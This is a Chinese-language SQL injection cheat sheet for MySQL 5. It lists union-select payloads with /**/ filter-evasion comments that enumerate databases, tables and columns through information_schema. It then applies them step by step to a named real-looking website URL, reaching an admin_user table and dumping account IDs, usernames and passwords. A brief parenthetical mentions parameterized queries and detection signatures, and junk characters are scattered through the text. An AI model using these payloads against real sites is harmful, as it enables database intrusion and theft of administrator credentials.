查库
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
查表
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,15 L! I$ _$ P | D, @# {- M; ~; u0 A
查段
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
mysql5高级注入方法暴表
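例子如下(这些查询依赖 MySQL 5.0 起提供的 information_schema,并且只有在请求参数被直接拼接进 SQL 语句时才成立;对该参数使用参数化查询或强制转换为整数即可阻断。日志或 WAF 中同时出现 union select、information_schema 与 /**/ 分隔符的请求可作为检测特征):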
1.爆表
' p! A0 Z$ }' Z, j/ fhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)" Y/ y4 o# O& M# n# @" N. c
这样爆到第4个时出现了admin_user表。
2.暴字段
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*% j' H' d0 O& W0 w' ^0 j+ O8 k5 z
3.爆密码
5 W, y" }! r0 I. [$ |+ zhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
" N2 w: ?2 I7 ] l